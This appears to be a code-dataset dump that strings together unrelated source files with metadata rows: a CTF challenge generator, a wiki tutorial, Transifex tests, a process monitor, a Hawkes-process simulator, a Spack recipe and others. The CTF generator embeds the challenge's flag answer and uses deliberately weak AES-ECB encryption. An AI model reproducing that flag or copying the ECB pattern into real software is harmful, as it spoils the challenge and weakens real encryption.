| gpl-3.0 | -761,279,693,771,877,400 | 16.057971 | 52 | 0.450297 | false |
DISMGryphons/GryphonCTF2017-Challenges | challenges/programming/AutoEncryptSys/generate/make.py | 1 | 1166 | from Crypto.Cipher import AES
import base64
import random
k="../distrib/"
def randomword(length):
return ''.join(random.choice("QWERTYUIOPASDFGHJKLZXCVBNM1234567890__________") for i in range(length))
def randomword1():
return ''.join(random.choice("QWERTYUIOPLKJHGFDSAZXCVBNM") for i in range(4))
def filename():
return ''.join(random.choice("asdfghjklzxcvbnmqwertyuiopQWERTYUIOPASDFGHJKLZXCVBNM") for i in range(16))
def encrypt(msg_text,secret_key):
msg_text = msg_text.rjust(32)
cipher = AES.new(secret_key,AES.MODE_ECB) # never use ECB in strong systems obviously
encoded = base64.b64encode(cipher.encrypt(msg_text))
return encoded.decode("utf-8")
# ...
def decrypt(msg_text,secret_key):
cipher = AES.new(secret_key,AES.MODE_ECB) # never use ECB in strong systems obviously
decoded = cipher.decrypt(base64.b64decode(msg_text))
return decoded
for i in range(1002):
zz=filename()
f=open(k+zz,"w")
D=randomword1()
while D=="GCTF":
D=randomword1()
j=D+"{"+randomword(random.randint(17,25))+"}"
if i==459:
j="GCTF{wh4ts_1n_th3_f1l355}"
print (encrypt(j,zz))
print(zz)
print()
print(encrypt(j,zz),file=f)
| gpl-3.0 | 4,262,148,654,617,338,000 | 28.15 | 107 | 0.702401 | false |
amcgregor/WebCore-Tutorial | web/app/wiki/root.py | 1 | 2314 | # Python's standard date + time object.
from datetime import datetime
# HTTP status code exception for "302 Found" redirection.
from webob.exc import HTTPFound
# MongoDB exceptions that may be raised when manipulating data.
from pymongo.errors import DuplicateKeyError
# Get a reference to our Article resource class and data model.
from .article import Article
from .model import WikiArticle as D # Shortened due to to repeated use.
class Wiki:
"""Basic multi-article editable wiki."""
__dispatch__ = 'resource' # The Wiki is a collection of pages, so use resource dispatch.
__resource__ = Article # Declare the type of resource we contain.
__collection__ = 'articles' # The default collection name to use when bound.
__home__ = 'Home' # The default homepage users are directed to if requesting the root.
def __init__(self, context, collection=None, record=None):
"""Executed when the root of the site (or children) are accessed, on each request."""
self._ctx = context # Store the "request context" for later use.
self.__collection__ = context.db[self.__collection__] # Get a reference to the collection we use.
def __getitem__(self, name):
"""Load data for the Article with the given name."""
# Attempt to locate a document by that name.
data = self.__collection__.find_one(D.name == name)
if not data: # If no record was found, populate some default data.
data = D(name) # Creation and modification times are constructed for us.
else:
data = D.from_mongo(data) # Otherwise, wrap in our model object.
return data
def get(self):
"""Called to handle direct requests to the web root itself."""
# Redirect users to the default home page.
return HTTPFound(location=str(self._ctx.path.current / self.__home__))
def post(self, name, content):
"""Save a new article to the database."""
try:
# Insert an article with the given name and content.
result = self.__collection__.insert_one(D(name, content))
except DuplicateKeyError:
return {
'ok': False,
'reason': 'duplicate',
'message': "An article with that name already exists.",
'name': name,
}
# All is well, so we inform the client.
return {
'ok': True,
'acknowledged': result.acknowledged,
'name': result.inserted_id
}
| mit | -5,330,814,030,077,170,000 | 32.536232 | 100 | 0.689283 | false |
tymofij/adofex | transifex/resources/tests/lib/registry.py | 1 | 5211 | # -*- coding: utf-8 -*-
from mock import Mock
from django.utils import unittest
from django.conf import settings
from transifex.resources.formats.registry import registry, _FormatsRegistry
from transifex.resources.formats.pofile import POHandler, POTHandler
from transifex.txcommon.tests.base import BaseTestCase
class TestRegistry(BaseTestCase):
def setUp(self):
super(TestRegistry, self).setUp()
methods = {
'PO': {
'description': 'PO file handler',
'file-extensions': '.po, .pot',
'mimetype': 'text/x-po, application/x-gettext, application/x-po',
}, 'QT': {
'description': 'Qt Files',
'mimetype': 'application/xml',
'file-extensions': '.ts'
},
}
handlers = {
'PO': 'resources.formats.pofile.POHandler',
'QT': 'resources.formats.qt.LinguistHandler',
}
self.registry = _FormatsRegistry(methods=methods, handlers=handlers)
def test_register(self):
from transifex.resources.formats.joomla import JoomlaINIHandler
self.registry.add_handler('INI', JoomlaINIHandler)
self.assertEquals(len(self.registry.handlers.keys()), 3)
self.assertIn('INI', self.registry.handlers.keys())
j = self.registry.handler_for('INI')
self.assertIsInstance(j, JoomlaINIHandler)
def test_extensions(self):
extensions = self.registry.extensions_for('PO')
self.assertEquals(len(extensions), 2)
self.assertEquals(extensions[0], '.po')
self.assertEquals(extensions[1], '.pot')
def test_mimetypes(self):
mimetypes = self.registry.mimetypes_for('PO')
self.assertEquals(len(mimetypes), 3)
self.assertEquals(mimetypes[0], 'text/x-po')
self.assertEquals(mimetypes[1], 'application/x-gettext')
self.assertEquals(mimetypes[2], 'application/x-po')
class TestAppropriateHandler(unittest.TestCase):
"""Test the process of finding the appropriate handler in
various situations.
"""
@classmethod
def setUpClass(cls):
cls.appropriate_handler = registry.appropriate_handler
def test_normal_types(self):
for method in settings.I18N_METHODS:
if method not in ('PO', 'POT', ):
resource = Mock()
resource.__dict__['i18n_type'] = method
handler = self.appropriate_handler(resource, None)
self.assertIsInstance(
handler, type(registry.handler_for(method))
)
def test_get(self):
resource = Mock()
resource.__dict__['i18n_type'] = 'PO'
resource.source_language = 'en'
handler = self.appropriate_handler(resource, None)
self.assertIsInstance(handler, POTHandler)
handler = self.appropriate_handler(resource, 'en')
self.assertIsInstance(handler, POHandler)
handler = self.appropriate_handler(resource, 'el')
self.assertIsInstance(handler, POHandler)
def test_save(self):
resource = Mock()
resource.__dict__['i18n_type'] = 'PO'
resource.source_language = 'en'
filename = 'f.po'
handler = self.appropriate_handler(resource, None, filename=filename)
self.assertIsInstance(handler, POHandler)
handler = self.appropriate_handler(resource, 'en', filename=filename)
self.assertIsInstance(handler, POHandler)
handler = self.appropriate_handler(resource, 'el', filename=filename)
self.assertIsInstance(handler, POHandler)
filename = 'f.pot'
handler = self.appropriate_handler(resource, None, filename=filename)
self.assertIsInstance(handler, POTHandler)
handler = self.appropriate_handler(resource, 'en', filename=filename)
self.assertIsInstance(handler, POTHandler)
handler = self.appropriate_handler(resource, 'el', filename=filename)
self.assertIsInstance(handler, POTHandler)
class TestFileExtensions(unittest.TestCase):
"""Test the file extensions used."""
def setUp(self):
self.resource = Mock()
self.resource.source_language = 'en'
def test_extensions(self):
for method in registry.available_methods:
if method == 'POT':
continue
self.resource.i18n_method = method
correct_extensions = registry.extensions_for(method)
for lang in ('en', 'el'):
extension_returned = registry.file_extension_for(
self.resource, lang
)
self.assertIn(extension_returned, correct_extensions)
def test_po_extensions(self):
"""Test PO/POT extensions.
If language is None: extension == 'pot'.
"""
self.resource.i18n_method = 'PO'
for lang in ('en', 'el', None):
extension = registry.file_extension_for(self.resource, lang)
if lang is None:
self.assertEqual(extension, registry.extensions_for('POT')[0])
else:
self.assertEqual(extension, registry.extensions_for('PO')[0])
| gpl-3.0 | -3,526,764,267,284,433,400 | 37.036496 | 81 | 0.61754 | false |
timesqueezer/mdfork | mooddiary/bundles.py | 1 | 1999 | from flask.ext.assets import Bundle
js = Bundle(
'bower_components/jquery/dist/jquery.js',
'bower_components/angular/angular.js',
'bower_components/angular-animate/angular-animate.js',
'bower_components/angular-cookies/angular-cookies.js',
'bower_components/angular-sanitize/angular-sanitize.js',
'bower_components/angular-localization/angular-localization.js',
'bower_components/angular-ui-router/release/angular-ui-router.js',
'bower_components/angular-grecaptcha/grecaptcha.js',
'bower_components/underscore/underscore.js',
'bower_components/angular-strap/dist/angular-strap.js',
'bower_components/angular-strap/dist/angular-strap.tpl.js',
'bower_components/Chart.js/Chart.js',
'bower_components/angular-chart.js/dist/angular-chart.js',
'bower_components/bootstrap/js/alert.js',
'bower_components/bootstrap/js/modal.js',
'bower_components/bootstrap/js/dropdown.js',
'bower_components/bootstrap/js/collapse.js',
'bower_components/angular-restmod/dist/angular-restmod-bundle.js',
'bower_components/angular-restmod/dist/plugins/dirty.js',
'bower_components/ngInfiniteScroll/build/ng-infinite-scroll.js',
'bower_components/ngSmoothScroll/lib/angular-smooth-scroll.js',
'bower_components/moment/moment.js',
'bower_components/Chart.Scatter/Chart.Scatter.js',
'angular-locale_de-de.js',
'bower_components/spectrum/spectrum.js',
'bower_components/angular-spectrum-colorpicker/dist/angular-spectrum-colorpicker.js',
'js/utils.js',
'js/diary.js',
'js/app.js',
output='gen/app.js',
filters='rjsmin'
)
css = Bundle(
'css/styles.less',
'bower_components/angular-chart.js/dist/angular-chart.css',
'bower_components/bca-flag-sprite/css/flags.css',
'bower_components/fontawesome/css/font-awesome.min.css',
'bower_components/flag-icon-css/css/flag-icon.css',
'bower_components/spectrum/spectrum.css',
output='gen/styles.css',
filters='less,cssmin'
)
| mit | 5,983,798,227,055,680,000 | 38.196078 | 89 | 0.728364 | false |
newmediamedicine/indivo_server_1_0 | indivo/views/reports/immunization.py | 1 | 2097 | """
.. module:: views.reports.immunization
:synopsis: Indivo view implementations for the immunization report.
.. moduleauthor:: Daniel Haas <[email protected]>
.. moduleauthor:: Ben Adida <[email protected]>
"""
from django.http import HttpResponseBadRequest, HttpResponse
from indivo.lib.view_decorators import marsloader, DEFAULT_ORDERBY
from indivo.lib.query import FactQuery, DATE, STRING, NUMBER
from indivo.models import Immunization
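# Maps query-API filter names to (model field, field type) pairs consumed by FactQuery.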
IMMUNIZATION_FILTERS = {
'vaccine_type' : ('vaccine_type', STRING),
'date_administered': ('date_administered', DATE),
DEFAULT_ORDERBY : ('created_at', DATE)
}
IMMUNIZATION_TEMPLATE = 'reports/immunization.xml'
def immunization_list(*args, **kwargs):
""" List the immunization data for a given record.
For 1:1 mapping of URLs to views. Just calls
:py:meth:`~indivo.views.reports.immunization._immunization_list`.
"""
return _immunization_list(*args, **kwargs)
def carenet_immunization_list(*args, **kwargs):
""" List the immunization data for a given carenet.
For 1:1 mapping of URLs to views. Just calls
:py:meth:`~indivo.views.reports.immunization._immunization_list`.
"""
return _immunization_list(*args, **kwargs)
@marsloader(query_api_support=True)
def _immunization_list(request, group_by, date_group, aggregate_by,
limit, offset, order_by,
status, date_range, filters,
record=None, carenet=None):
""" List the immunization objects matching the passed query parameters.
See :doc:`/query-api` for a listing of valid parameters.
Will return :http:statuscode:`200` with a list of immunizations on success,
:http:statuscode:`400` if any invalid query parameters were passed.
"""
q = FactQuery(Immunization, IMMUNIZATION_FILTERS,
group_by, date_group, aggregate_by,
limit, offset, order_by,
status, date_range, filters,
record, carenet)
try:
return q.render(IMMUNIZATION_TEMPLATE)
except ValueError as e:
return HttpResponseBadRequest(str(e))
| gpl-3.0 | 8,928,572,799,692,341,000 | 31.261538 | 77 | 0.692895 | false |
Sam-Gram/PiWood-Derby | track.py | 1 | 1071 | import time
from displays import Displays
from sensors import Sensors
class Track():
def __init__(self):
self.sensors = Sensors()
self.displays = Displays()
def startRace(self):
self.displays.clear()
self.sensors.start()
def stopRace(self):
# No need to keep sensing when no race is happening
self.sensors.stop()
self.displays.displayTimes(self.sensors.getTimes())
return self.sensors.getTimes()
def getTimes(self):
return self.sensors.getTimes()
def test(self):
self.displays.displayHex([0xba5e, 0xba11, 0x0])
time.sleep(2)
self.displays.displayHex([0x0, 0xcafe, 0xbabe])
time.sleep(2)
self.displays.displayHex([0xdead, 0x0, 0xbeef])
time.sleep(2)
self.displays.clear()
time.sleep(1)
currentTime = time.time()
while (currentTime + 12.0) > time.time():
self.displays.displayTimes(self.sensors.getState())
print self.sensors.getGateInput()
self.displays.clear()
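# Illustrative race flow, assuming the derby hardware behind Sensors/Displays
# is connected (not runnable without it):
#   track = Track()
#   track.startRace()
#   # ... cars roll ...
#   times = track.stopRace()  # stops sensing and shows the times on the displays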
| mit | 1,294,967,940,751,215,900 | 28.75 | 63 | 0.615313 | false |
slinderman/pyhawkes | data/synthetic/generate_synthetic_data.py | 1 | 4150 | import pickle
import os
import gzip
import numpy as np
import matplotlib.pyplot as plt
from pyhawkes.models import DiscreteTimeNetworkHawkesModelSpikeAndSlab
from pyhawkes.plotting.plotting import plot_network
def generate_synthetic_data(seed=None):
"""
Create a discrete time Hawkes model and generate from it.
:return:
"""
if seed is None:
seed = np.random.randint(2**32)
print("Setting seed to ", seed)
np.random.seed(seed)
# Create a true model
# Larger v (weight scale) implies smaller weights
T_test=1000
# Debugging network:
# C = 1
# K = 4
# T = 1000
# dt = 1.0
# B = 3
# p = 0.5
# kappa = 3.0
# v = kappa * 5.0
# c = np.zeros(K, dtype=np.int)
# Small network:
# Seed: 1957629166
# C = 4
# K = 20
# T = 10000
# dt = 1.0
# B = 3
# kappa = 3.0
# p = 0.9 * np.eye(C) + 0.05 * (1-np.eye(C))
# v = kappa * (5.0 * np.eye(C) + 25.0 * (1-np.eye(C)))
# c = np.arange(C).repeat((K // C))
# Medium network:
# Seed: 2723361959
# C = 5
# K = 50
# T = 100000
# dt = 1.0
# B = 3
# kappa = 3.0
# p = 0.75 * np.eye(C) + 0.05 * (1-np.eye(C))
# v = kappa * (9 * np.eye(C) + 25.0 * (1-np.eye(C)))
# c = np.arange(C).repeat((K // C))
# Medium netowrk 2:
# Seed = 3848328624
# C = 5
# K = 50
# T = 100000
# dt = 1.0
# B = 3
# kappa = 2.0
# c = np.arange(C).repeat((K // C))
# p = 0.4 * np.eye(C) + 0.01 * (1-np.eye(C))
# v = kappa * (5 * np.eye(C) + 5.0 * (1-np.eye(C)))
# Medium netowrk, one cluster
# Seed: 3848328624
C = 1
K = 50
T = 100000
dt = 1.0
B = 3
p = 0.08
kappa = 3.0
v = kappa * 5.0
c = np.zeros(K, dtype=np.int)
# Large network:
# Seed = 2467634490
# C = 5
# K = 100
# T = 100000
# dt = 1.0
# B = 3
# kappa = 3.0
# p = 0.4 * np.eye(C) + 0.025 * (1-np.eye(C))
# v = kappa * (10 * np.eye(C) + 25.0 * (1-np.eye(C)))
# c = np.arange(C).repeat((K // C))
# Large network 2:
# Seed =
# C = 10
# K = 100
# T = 100000
# dt = 1.0
# B = 3
# kappa = 3.0
# p = 0.75 * np.eye(C) + 0.05 * (1-np.eye(C))
# v = kappa * (9 * np.eye(C) + 25.0 * (1-np.eye(C)))
# c = np.arange(C).repeat((K // C))
# Extra large network:
# Seed: 2327447870
# C = 20
# K = 1000
# T = 100000
# dt = 1.0
# B = 3
# kappa = 3.0
# p = 0.25 * np.eye(C) + 0.0025 * (1-np.eye(C))
# v = kappa * (15 * np.eye(C) + 30.0 * (1-np.eye(C)))
# c = np.arange(C).repeat((K // C))
# Create the model with these parameters
network_hypers = {'C': C, 'kappa': kappa, 'c': c, 'p': p, 'v': v}
# Create a simple network
from pyhawkes.internals.network import ErdosRenyiFixedSparsity
network = ErdosRenyiFixedSparsity(K, p, kappa, v=v)
true_model = DiscreteTimeNetworkHawkesModelSpikeAndSlab(K=K, dt=dt, B=B,
network=network)
assert true_model.check_stability()
# Plot the true network
plt.ion()
plot_network(true_model.weight_model.A,
true_model.weight_model.W)
plt.pause(0.001)
# Sample from the true model
S,R = true_model.generate(T=T, keep=False, print_interval=50)
# Pickle and save the data
out_dir = os.path.join('data', "synthetic")
out_name = 'synthetic_K%d_C%d_T%d.pkl.gz' % (K,C,T)
out_path = os.path.join(out_dir, out_name)
with gzip.open(out_path, 'w') as f:
print("Saving output to ", out_path)
pickle.dump((S, true_model), f, protocol=-1)
# Sample test data
S_test,_ = true_model.generate(T=T_test, keep=False)
# Pickle and save the data
out_dir = os.path.join('data', "synthetic")
out_name = 'synthetic_test_K%d_C%d_T%d.pkl.gz' % (K,C,T_test)
out_path = os.path.join(out_dir, out_name)
with gzip.open(out_path, 'w') as f:
print("Saving output to ", out_path)
pickle.dump((S_test, true_model), f, protocol=-1)
# demo(2203329564)
generate_synthetic_data(3848328624)
| mit | 1,682,420,631,108,487,000 | 24 | 76 | 0.521687 | false |
zhanxw/bench | scripts/monitor.py | 1 | 10275 | #!/usr/bin/env python
import sys, os
from itertools import chain
# d is a pandas.DataFrame
def printTable(d, sep=' ', outFile=sys.stderr):
    cols = d.columns
    col_widths = list(max(len(str(elem)) for elem in chain(d[col], [col])) for col in cols)
    print >> outFile, sep.join('{value:>{width}}'.format(value=str(name), width=width) for name, width in zip(cols, col_widths))
    for row in d.iterrows():
        print >> outFile, sep.join('{value:>{width}}'.format(value=str(name), width=width) for name, width in zip(row[1], col_widths))
def calculateMean(timePoint, value):
#print "tp = ", timePoint
#print "value = ", value
if len(value) == 1:
return value
value = value[0:-1]
weight = timePoint[1:] - timePoint[0:-1]
totalSpan = timePoint[-1] - timePoint[0]
if any((i < 0 for i in weight)):
print >> sys.stderr, "Timepoint is not monotonelly increasing!"
return 0.
if totalSpan == 0.0:
return value[0]
avg = np.sum(weight * value) / totalSpan
return avg
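# Worked example of the time-weighted mean above (hypothetical numpy arrays):
#   timePoint = np.array([0.0, 1.0, 3.0]); value = np.array([10.0, 20.0, 99.0])
#   -> weights = [1.0, 2.0], kept values = [10.0, 20.0], span = 3.0
#   -> calculateMean(...) = (1.0*10.0 + 2.0*20.0) / 3.0 = 50.0/3.0 ~ 16.67
# The last sample is dropped because it has no following timestamp to weight it.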
def draw(dRaw, dg, outFile):
try:
import matplotlib
import matplotlib.pyplot as plt
except:
print >> sys.stderr, "Cannot import matplotlib, skipping generating graphs"
return
plt.rc('legend', fontsize=6)
plt.rc('ytick', labelsize = 'small')
fig = plt.figure(figsize = (15, 15))
ax = fig.add_subplot(3, 3, 1)
## increase space between subplots
fig.subplots_adjust(wspace = .5, hspace = .5)
getProgName = lambda x: x.split()[0].split('/')[-1]
dg['prog'] = dg.apply(lambda x: getProgName(x['cmd']) + '(%d)' % x['pid'] ,axis = 1)
dg.index = dg['prog']
dg[['utime']].plot(kind = 'barh', title = "User Time (s)", ax = ax)
plt.ylabel('')
# plt.yticks(rotation = 45) # this does not produce nice looking graphs
ax = fig.add_subplot(3, 3, 2)
dg[['stime']].plot(kind = 'barh', title = "System Time (s)", ax = ax)
plt.ylabel('')
ax = fig.add_subplot(3, 3, 3)
dg[['rtime']].plot(kind = 'barh', title = "Real Time (s)", ax = ax)
plt.ylabel('')
def scaleUnit(x):
if (x.max() > 1024 ** 3).all():
return ( 1024 ** 3, "Gb")
if (x.max() > 1024 ** 2).all():
return ( 1024 ** 2, "Mb")
if (x.max() > 1024).all():
return ( 1024, "Kb")
return ( 1, "B")
rssScale = scaleUnit(dRaw[['rss']])
dg[['maxRss']] = dg[['maxRss']] / rssScale[0]
ax = fig.add_subplot(3, 3, 4)
dg[['maxRss']].plot(kind = 'barh', title = "Max RSS (" + rssScale[1]+")", ax = ax)
plt.ylabel('')
dg[['avgRss']] = dg[['avgRss']] / rssScale[0]
ax = fig.add_subplot(3, 3, 5)
dg[['avgRss']].plot(kind = 'barh', title = "Avg RSS (" + rssScale[1]+")", ax = ax)
plt.ylabel('')
vmsScale = scaleUnit(dRaw[['vms']])
dg[['maxVms']] = dg[['maxVms']] / vmsScale[0]
ax = fig.add_subplot(3, 3, 6)
dg[['maxVms']].plot(kind = 'barh', title = "Max VMS (" + vmsScale[1]+")", ax = ax)
plt.ylabel('')
dg[['avgVms']] = dg[['avgVms']] / vmsScale[0]
ax = fig.add_subplot(3, 3, 7)
dg[['avgVms']].plot(kind = 'barh', title = "Avg VMS (" + vmsScale[1]+")", ax = ax)
plt.ylabel('')
    def calculateYLimit(x, coef=1.5):
        a, b = x.min(), x.max()
        c = (a + b) / 2
        d = c - a
        if d == 0.0:
            return (a - 1, b + 1)
        return (c - d * coef, c + d * coef)
dRaw['prog'] = dRaw.apply(lambda x: getProgName(x['cmd']) + '(%d)' % x['pid'] ,axis = 1)
dRaw['rss'] = dRaw['rss'] / rssScale[0]
ax = fig.add_subplot(3, 3, 8)
for k, v in dRaw.groupby('prog'):
plt.plot(v['rtime'], v['rss'], label = k, marker = '.')
plt.ylim(calculateYLimit(dRaw['rss']))
plt.title("RSS (%s) vs. Real Time (s)" % rssScale[1])
plt.legend()
#plt.legend(bbox_to_anchor=(1.05, 1), loc = 2)
dRaw[['vms']] = dRaw[['vms']] / vmsScale[0]
ax = fig.add_subplot(3, 3, 9)
for k, v in dRaw.groupby('prog'):
plt.plot(v['rtime'], v['vms'], label = k, marker = '.')
plt.ylim(calculateYLimit(dRaw['vms']))
plt.title("VMS (%s) vs. Real Time (s)" % vmsScale[1])
plt.legend()
#plt.legend(bbox_to_anchor=(1.05, 1), loc = 2)
fig.savefig(outFile)
def usage():
print("Usage: ")
print("%s [-i interval] [-o outputFile] [-s] [-t] [-g] [-q] commands" % sys.argv[0] )
print(" -i interval: sampling interval")
print(" -o outputFile: benchmark summary printed to 'outputFile' (default: stderr)")
print(" -t: output trace of benchmarking metrics (default: stderr; use -o to change)")
print(" -g: output a PNG graph showing cpu and memory usage (need matplotlib)")
print(" -q: quiet mode, do not output anything to the console")
print
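# Example invocation (illustrative; 'sleep 10' stands in for any command):
#   ./monitor.py -i 0.5 -o bench -t -g sleep 10
# samples every 0.5s, prints a per-process trace to stderr, and writes
# bench.csv, bench.trace.csv and bench.png when the command exits.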
if __name__ == '__main__':
try:
import getopt
optlist, args = getopt.getopt(sys.argv[1:], 'i:o:hstgq')
optlist = dict(optlist)
interval = float(optlist.get('-i', 0.1))
## to avoid record too many snapshots, scale up the value of interval
if '-i' in optlist:
intervalScaling = None
else:
intervalScaling = 2 * interval
if interval <= 0:
print >> sys.stderr, "Sampling interval should be larger than zero, but [ %s ] given" % optlist.get('-i')
sys.exit(1)
if '-o' in optlist:
outFile = optlist['-o']
else:
outFile = sys.stderr
# useShell = '-s' in optlist
outGraph = '-g' in optlist
outTrace = '-t' in optlist
trace = outGraph or outTrace
quietMode = '-q' in optlist
if '-h' in optlist:
usage()
sys.exit(0)
if len(args) == 0:
print >> sys.stderr, "No command(s) given. See helps below..."
usage()
sys.exit(0)
## print 'args = ', args
command = args
except:
usage()
raise
sys.exit(1)
import time
import psutil
import numpy as np
import pandas as pd
if outTrace:
print >> sys.stderr, '\t'.join(['pid', 'ppid', 'utime', 'stime', 'rtime', 'rss', 'vms', 'cwd', 'cmd'])
startTime = time.time()
mainProc = psutil.Popen(command, shell = False)
result = [] # time, pid, cwd, cmd, cpu_times, mem_info
# gather metrics while process/sub-process is still running.
activeSet = set() ##
activeSet.add(mainProc)
while activeSet:
## put all processes to the active queuee
newActiveSet = set()
mainProc.poll() ## need to call poll() so is_running() can work
for p in activeSet:
if p in newActiveSet: continue
try:
children = p.children()
for c in children:
if c.is_running():
newActiveSet.add(c)
except psutil.NoSuchProcess:
continue
activeSet |= newActiveSet
## examine each active proc
## remove inactive proc
toRemoveSet = set()
for p in activeSet:
try:
val = [
time.time() - startTime,
p.pid,
p.ppid(),
p.cpu_times(),
p.memory_info(),
p.cwd(),
p.cmdline()
]
except (psutil.NoSuchProcess, psutil.AccessDenied):
val = [
time.time() - startTime,
None,
None,
None,
None,
None,
None
]
if outTrace:
if val[1] != None:
print >> sys.stderr, '\t'.join(map(str, [val[1], val[2], val[3].user, val[3].system,val[0], val[4].rss, val[4].vms, val[5], ' '.join(val[6])]))
else:
print >> sys.stderr, '\t'.join(map(str, [None, None, None, None, val[0], None, None, None,None]))
if val[1] != None:
result.append(val)
if not p.is_running():
toRemoveSet.add(p)
activeSet -= toRemoveSet
## automatically increase check interval to save memory
if intervalScaling and len(result) % 1000 == 0:
interval = intervalScaling
intervalScaling *= 2
## wait a bit
time.sleep(interval)
# Summarize results
df = pd.DataFrame.from_items([('pid', [i[1] for i in result]),
('ppid', [i[2] for i in result]),
('utime', [i[3].user for i in result]),
('stime', [i[3].system for i in result]),
('rtime', [i[0] for i in result]),
('rss', [i[4].rss for i in result]),
('vms', [i[4].vms for i in result]),
('cwd', [i[5] for i in result]),
('cmd', [' '.join(i[6]) for i in result])
])
if outFile != sys.stderr:
df.to_csv(outFile + ".trace.csv", index = False)
# Group by pid
def f(x):
tp = np.copy(x['rtime'])
x['utime'] = np.max(x['utime'])
x['stime'] = np.max(x['stime'])
x['rtime'] = np.max(x['rtime'])
x['maxRss'] = np.max(x['rss'])
x['maxVms'] = np.max(x['vms'])
x['avgRss'] = calculateMean(tp, x['rss'])
x['avgVms'] = calculateMean(tp, x['vms'])
return x
dOut = df.groupby('pid').apply(f)
dOut = dOut.drop_duplicates(subset = 'pid')
dOut = pd.concat([dOut.drop(['cwd','cmd'], axis = 1), dOut[['cwd','cmd']]], axis = 1)
# print df
# print dOut
if outFile != sys.stderr:
dOut.to_csv(outFile + '.csv', index = False)
elif not quietMode:
printTable(dOut)
if outGraph:
if outFile == sys.stderr:
draw(df, dOut, "bench.png")
else:
draw(df, dOut, outFile + ".png")
| gpl-2.0 | -1,233,636,329,327,026,400 | 34.926573 | 163 | 0.493917 | false |
shawnhermans/olivaw | ml/classifiers.py | 1 | 2961 | from sklearn import cross_validation
from sklearn.ensemble import RandomForestClassifier
from ml.metrics import BinaryClassifierMetricsFactory
from ml.vectorizers import prepare_dataset
class BinaryRandomForestClassifier(object):
def __init__(self, clf, vectorizer):
self._clf = clf
self._vectorizer = vectorizer
if not self.is_binary:
raise ValueError('BinaryRandomForestClassifier only supports binary label values')
self._true_index = list(self.class_labels).index('True')
@property
def is_binary(self):
if len(self.class_labels) == 2:
if 'True' in self.class_labels and 'False' in self.class_labels:
return True
return False
def _true_prediction_probs(self, predictions):
return list(predictions.transpose()[self._true_index])
def predict_instances(self, instances):
"""
Expects instances from the DB model
"""
x = self._vectorizer.vectorize_instances(instances)
predictions = self._clf.predict_proba(x)
return self._true_prediction_probs(predictions)
def predict_records(self, records):
"""
Expects array of dicts
"""
x = self._vectorizer.vectorize_records(records)
predictions = self._clf.predict_proba(x)
return self._true_prediction_probs(predictions)
def predict_vectors(self, vectors):
"""
Expects an vectorized ndarray for input
"""
predictions = self._clf.predict_proba(vectors)
return self._true_prediction_probs(predictions)
@property
def feature_importances(self):
return self._vectorizer.inverse_transform(self._clf.feature_importances_)[0]
@property
def class_labels(self):
return self._clf.classes_
class ClassifierFactory(object):
@classmethod
def build_binary_random_forest_classifier(cls, training_dataset, target_attribute, vectorizer, n_estimators=10):
classifier = RandomForestClassifier(n_estimators=n_estimators, n_jobs=-1)
records, labels = prepare_dataset(training_dataset, target_attribute)
vector_data = vectorizer.vectorize_records(records)
x_train, x_test, y_train, y_test = cls._train_test_split(vector_data, labels)
cls._fit_model(x_train, y_train, classifier)
classifier = BinaryRandomForestClassifier(classifier, vectorizer)
metrics = BinaryClassifierMetricsFactory.build_binary_classifier_metrics(x_test, y_test, classifier)
return classifier, metrics
@classmethod
def _train_test_split(cls, vector_data, labels):
x = vector_data
y = labels
x_train, x_test, y_train, y_test = cross_validation.train_test_split(x, y, test_size=0.1, random_state=0)
return x_train, x_test, y_train, y_test
@classmethod
def _fit_model(cls, x_train, y_train, classifier):
classifier.fit(x_train, y_train)
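# Illustrative usage sketch; `dataset`, `target` and `vectorizer` are placeholders
# for objects provided by the surrounding project, not defined in this module:
#   clf, metrics = ClassifierFactory.build_binary_random_forest_classifier(
#       dataset, target, vectorizer, n_estimators=50)
#   probs = clf.predict_records([{'feature_a': 1.0, 'feature_b': 'x'}])
#   important = clf.feature_importances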
| bsd-3-clause | 2,756,950,344,969,688,000 | 33.835294 | 116 | 0.669031 | false |
LLNL/spack | var/spack/repos/builtin/packages/util-linux/package.py | 1 | 2266 | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class UtilLinux(AutotoolsPackage):
"""Util-linux is a suite of essential utilities for any Linux system."""
homepage = "https://github.com/karelzak/util-linux"
url = "https://www.kernel.org/pub/linux/utils/util-linux/v2.29/util-linux-2.29.2.tar.gz"
list_url = "https://www.kernel.org/pub/linux/utils/util-linux"
list_depth = 1
version('2.35.1', sha256='37ac05d82c6410d89bc05d43cee101fefc8fe6cf6090b3ce7a1409a6f35db606')
version('2.35', sha256='98acab129a8490265052e6c1e033ca96d68758a13bb7fcd232c06bf16cc96238')
version('2.34', sha256='b62c92e5e1629642113cd41cec1ee86d1ee7e36b8ffe8ec3ac89c11797e9ac25')
version('2.33', sha256='952fb0d3498e81bd67b3c48e283c80cb12c719bc2357ec5801e7d420991ad319')
version('2.29.2', sha256='29ccdf91d2c3245dc705f0ad3bf729ac41d8adcdbeff914e797c552ecb04a4c7')
version('2.29.1', sha256='a6a7adba65a368e6dad9582d9fbedee43126d990df51266eaee089a73c893653')
version('2.25', sha256='7e43273a9e2ab99b5a54ac914fddf5d08ba7ab9b114c550e9f03474672bd23a1')
depends_on('[email protected]:')
depends_on('pkgconfig')
depends_on('gettext', when='+libmount')
# Make it possible to disable util-linux's libuuid so that you may
# reliably depend_on(`libuuid`).
variant('libuuid', default=True, description='Build libuuid')
variant('libmount', default=False, description='Build libmount.so with gettext')
def url_for_version(self, version):
url = "https://www.kernel.org/pub/linux/utils/util-linux/v{0}/util-linux-{1}.tar.gz"
return url.format(version.up_to(2), version)
def setup_build_environment(self, env):
if '+libmount' in self.spec:
env.append_flags('LDFLAGS', '-L{0} -lintl'.format(
self.spec['gettext'].prefix.lib))
def configure_args(self):
config_args = [
'--disable-use-tty-group',
'--disable-makeinstall-chown',
'--without-systemd'
]
config_args.extend(self.enable_or_disable('libuuid'))
return config_args
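    # Example installs (assuming a working Spack setup):
    #   spack install util-linux+libmount   # build libmount against gettext
    #   spack install util-linux~libuuid    # skip the bundled libuuid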
| lgpl-2.1 | 1,896,356,911,546,345,500 | 44.32 | 97 | 0.704766 | false |
yeyanchao/calibre | setup/installer/osx/app/main.py | 1 | 23748 | #!/usr/bin/env python
# vim:fileencoding=UTF-8:ts=4:sw=4:sta:et:sts=4:ai
from __future__ import with_statement
__license__ = 'GPL v3'
__copyright__ = '2009, Kovid Goyal <[email protected]>'
__docformat__ = 'restructuredtext en'
